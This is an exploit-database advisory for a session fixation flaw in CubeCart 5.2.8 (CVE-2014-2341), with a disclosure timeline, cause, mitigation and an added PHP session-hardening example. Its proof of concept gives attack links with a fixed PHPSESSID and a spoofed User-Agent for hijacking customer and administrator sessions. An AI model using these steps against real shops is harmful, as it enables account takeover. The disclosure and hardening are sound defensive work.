0day.today - Biggest Exploit Database in the World.
CubeCart 5.2.8 - Session Fixation
Security Risk Medium
# Exploit Title: CubeCart 5.2.8 Session Fixation
# Exploit Author: James Sibley (absane)
# Blog: http://www.pentester.co
# Download link: http://www.cubecart.com/download/5.2.8/zip
# Discovery date: March 14th, 2014
# Vendor notified: March 15th, 2014
# Vendor fixed: April 10th, 2014
# Vendor ack: http://forums.cubecart.com/topic/48427-cubecart-529-relased/
# CVE assignment: CVE-2014-2341

CubeCart 5.2.8 is vulnerable to session fixation. The only protection offered is via the User-Agent header field, which can be spoofed to match the victim.

=======================
=Proof of Concept.....=
=======================

*Set the User-Agent for both attacker and victim:
 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)

*To attack a customer:
 Victim visits: http://[CubeCart Site]/index.php?PHPSESSID=1337

*To attack an administrator:
 Victim visits: http://[CubeCart Site]/admin.php?PHPSESSID=1337

When the victim logs in, the attacker can visit the same link (using the same User-Agent) and hijack the victim's session.

=======================
=Cause................=
=======================

The PHPSESSID parameter is not ignored and allows an attacker to specify their own session id. The code handling login procedures does not generate new sessions upon successful authentication.

=======================
=Mitigation...........=
=======================

Upgrade to CubeCart >= 5.2.9

If upgrading is not an option, here is a hackish workaround for the session fixation vulnerability:

In admin.class.php add this at line 324:
 $GLOBALS['session']->restart();

In user.class.php add this at line 227:
 $GLOBALS['session']->restart();

# 0day.today [2024-07-02] #
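
The two causes named above, handled with PHP's built-in session settings. This is an added example, not CubeCart's code or the author's workaround; the function names are hypothetical and the code assumes PHP 7.1 or later.

```php
<?php
// Added example: plain-PHP session handling, not CubeCart's code.
// start_hardened_session() and complete_login() are hypothetical names.

function start_hardened_session(): void
{
    // Cause 1 on the page: an ID supplied as ?PHPSESSID=... was honoured.
    ini_set('session.use_only_cookies', '1'); // take the ID from the cookie only
    ini_set('session.use_trans_sid', '0');    // never emit IDs into URLs
    ini_set('session.use_strict_mode', '1');  // refuse IDs the server never issued
    ini_set('session.cookie_httponly', '1');  // keep the cookie away from scripts

    // Detection: with URL-based IDs disabled, a session ID in the request
    // parameters is never legitimate, so record it for review.
    $name = session_name(); // "PHPSESSID" by default
    if (isset($_GET[$name]) || isset($_POST[$name])) {
        error_log(sprintf(
            'session id in request parameters from %s',
            $_SERVER['REMOTE_ADDR'] ?? 'unknown'
        ));
    }

    session_start();
}

function complete_login(int $userId): void
{
    // Cause 2 on the page: the pre-login ID survived authentication.
    // Issue a new ID and delete the old session, so an ID known before
    // login no longer maps to the authenticated session.
    if (!session_regenerate_id(true)) {
        throw new RuntimeException('could not rotate session id');
    }
    $_SESSION['user_id'] = $userId;
}

// CLI check with a constructed user id: the ID must change across login.
if (PHP_SAPI === 'cli') {
    session_save_path(sys_get_temp_dir());
    start_hardened_session();
    $before = session_id();
    complete_login(42);
    printf("rotated: %s\n", $before !== session_id() ? 'yes' : 'no');
}
```

The User-Agent comparison is deliberately absent: as the advisory notes, the header is attacker-controlled and does not bind a session to a client.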